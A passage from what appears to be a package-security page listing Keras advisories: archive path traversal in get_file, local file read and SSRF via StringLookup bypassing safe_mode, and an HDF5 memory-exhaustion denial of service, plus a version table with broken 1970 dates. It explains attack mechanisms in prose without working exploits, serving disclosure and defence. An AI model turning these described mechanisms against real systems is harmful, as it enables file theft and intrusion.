Impact
Vulnerability Classification
- Type: Directory Traversal / Path Traversal (CWE-22)
- Severity: High
- CVSS Components: Network accessible, no authentication required, impacts confidentiality and integrity
Who Is Impacted
Direct Impact: - Applications using keras.utils.get_file() with extract=True - Machine learning pipelines downloading and extracting datasets - Automated ML training systems processing external archives
Attack Scenarios: 1. Malicious datasets: Attacker hosts compromised ML dataset 2. Supply chain: Legitimate dataset repositories compromised 3. Model poisoning: Extraction writes malicious files alongside training data 4. System compromise: Configuration files, executables written to system directories
Affected Environments: - Research environments downloading public datasets - Production ML systems with automated dataset fetching - Educational platforms using Keras for tutorials - CI/CD pipelines training models with external data
Risk Assessment
High Risk Factors: - Common usage pattern in ML workflows - No user awareness of extraction security - Silent failure mode (no warnings) - Cross-platform vulnerability
Potential Consequences: - Arbitrary file write on target system - Configuration file tampering - Code injection via overwritten scripts - Data exfiltration through planted files - System compromise in containerized environments
Recommended Fix
Immediate Mitigation
Replace the vulnerable extraction code with:
# Secure implementation
if zipfile.is_zipfile(file_path):
# Zip archive - implement similar filtering
archive.extractall(path, members=filter_safe_paths(archive))
else:
# Tar archive with proper security filter
archive.extractall(path, members=filter_safe_paths(archive), filter="data")
Long-term Solution
- Add
filter="data"parameter to alltarfile.extractall()calls - Implement comprehensive path validation before extraction
- Add extraction logging for security monitoring
- Consider sandboxed extraction for untrusted archives
- Update documentation to warn about archive security risks
Backward Compatibility
The fix maintains full backward compatibility as filter="data" is the recommended secure default for Python 3.12+.
References
- Python tarfile security documentation
- CVE-2007-4559 - Related tarfile vulnerability
- OWASP Path Traversal
Note: Reported in Huntr as well, but didn't get response https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4
Keras is vulnerable to arbitrary local file loading and Server-Side Request Forgery
- https://github.com/keras-team/keras/security/advisories/GHSA-qg93-c7p6-gg7f
- https://nvd.nist.gov/vuln/detail/CVE-2025-12058
- https://github.com/keras-team/keras/pull/21751
- https://github.com/keras-team/keras/commit/61ac8c1e51862c471dee7b49029c356f55531487
- https://www.cve.org/CVERecord?id=CVE-2025-12058
- https://github.com/advisories/GHSA-mq84-hjqx-cwf2
The Keras.Model.loadmodel method, including when executed with the intended security mitigation safemode=True, is vulnerable to arbitrary local file loading and Server-Side Request Forgery (SSRF).
This vulnerability stems from the way the StringLookup layer is handled during model loading from a specially crafted .keras archive. The constructor for the StringLookup layer accepts a vocabulary argument that can specify a local file path or a remote file path.
Arbitrary Local File Read: An attacker can create a malicious .keras file that embeds a local path in the StringLookup layer's configuration. When the model is loaded, Keras will attempt to read the content of the specified local file and incorporate it into the model state (e.g., retrievable via get_vocabulary()), allowing an attacker to read arbitrary local files on the hosting system.
Server-Side Request Forgery (SSRF): Keras utilizes tf.io.gfile for file operations. Since tf.io.gfile supports remote filesystem handlers (such as GCS and HDFS) and HTTP/HTTPS protocols, the same mechanism can be leveraged to fetch content from arbitrary network endpoints on the server's behalf, resulting in an SSRF condition.
The security issue is that the feature allowing external path loading was not properly restricted by the safe_mode=True flag, which was intended to prevent such unintended data access.
Duplicate Advisory: Keras safe mode bypass vulnerability
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-c9rc-mg46-23w3. This link is maintained to preserve external references.
Original Description
A safe mode bypass vulnerability in the Model.load_model method in Keras versions 3.0.0 through 3.10.0 allows an attacker to achieve arbitrary code execution by convincing a user to load a specially crafted .keras model archive.
Google Keras Allocates Resources Without Limits or Throttling in the HDF5 weight loading component
- https://nvd.nist.gov/vuln/detail/CVE-2026-0897
- https://github.com/keras-team/keras/pull/21880
- https://github.com/keras-team/keras/commit/7360d4f0d764fbb1fa9c6408fe53da41974dd4f6
- https://github.com/advisories/GHSA-xfhx-r7ww-5995
- https://github.com/keras-team/keras/pull/22081
- https://github.com/keras-team/keras/commit/f704c887bf459b42769bfc8a9182f838009afddb
Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.12.0 and 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape.
118 Other Versions
| Version | License | Security | Released | |
|---|---|---|---|---|
| 3.14.0 | Apache-2.0 | |||
| 3.13.2 | Apache-2.0 | |||
| 3.13.1 | Apache-2.0 | 2 | ||
| 3.13.0 | Apache-2.0 | 3 | ||
| 3.12.1 | Apache-2.0 | 1 | ||
| 3.12.0 | Apache-2.0 | 3 | ||
| 3.11.3 | Apache-2.0 | 6 | ||
| 3.11.2 | Apache-2.0 | 9 | ||
| 3.11.1 | Apache-2.0 | 9 | ||
| 3.11.0 | Apache-2.0 | 9 | ||
| 3.10.0 | Apache-2.0 | 11 | ||
| 3.9.2 | Apache-2.0 | 11 | 1970-01-01 - 00:00 | over 56 years |
| 3.9.1 | Apache-2.0 | 11 | 1970-01-01 - 00:00 | over 56 years |
| 3.9.0 | Apache-2.0 | 11 | 1970-01-01 - 00:00 | over 56 years |
| 3.8.0 | Apache-2.0 | 13 | 1970-01-01 - 00:00 | over 56 years |
| 3.7.0 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.6.0 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.5.0 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.4.1 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.4.0 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.3.3 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.3.2 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.3.1 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.3.0 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.2.1 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.2.0 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.1.1 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.1.0 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.0.5 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.0.4 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.0.3 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.0.2 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.0.1 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 3.0.0 | Apache-2.0 | 14 | 1970-01-01 - 00:00 | over 56 years |
| 2.15.0 | Apache-2.0 | 6 | 1970-01-01 - 00:00 | over 56 years |
| 2.15.0rc1 | Apache-2.0 | 6 | 1970-01-01 - 00:00 | over 56 years |
| 2.15.0rc0 | Apache-2.0 | 6 | 1970-01-01 - 00:00 | over 56 years |
| 2.14.0 | Apache-2.0 | 6 | 1970-01-01 - 00:00 | over 56 years |
| 2.14.0rc0 | Apache-2.0 | 6 | 1970-01-01 - 00:00 | over 56 years |
| 2.13.1 | Apache-2.0 | 6 | 1970-01-01 - 00:00 | over 56 years |
| 2.13.1rc1 | Apache-2.0 | 6 | 1970-01-01 - 00:00 | over 56 years |
| 2.13.1rc0 | Apache-2.0 | 6 | 1970-01-01 - 00:00 | over 56 years |
| 2.12.0 | Apache-2.0 | 7 | 1970-01-01 - 00:00 | over 56 years |
| 2.12.0rc1 | Apache-2.0 | 7 | 1970-01-01 - 00:00 | over 56 years |
| 2.12.0rc0 | Apache-2.0 | 7 | 1970-01-01 - 00:00 | over 56 years |
| 2.11.0 | Apache-2.0 | 7 | 1970-01-01 - 00:00 | over 56 years |
| 2.11.0rc3 | Apache-2.0 | 7 | 1970-01-01 - 00:00 | over 56 years |
| 2.11.0rc2 | Apache-2.0 | 7 | 1970-01-01 - 00:00 | over 56 years |
| 2.11.0rc1 | Apache-2.0 | 7 | 1970-01-01 - 00:00 | over 56 years |
| 2.11.0rc0 | Apache-2.0 | 7 | 1970-01-01 - 00:00 | over 56 years |
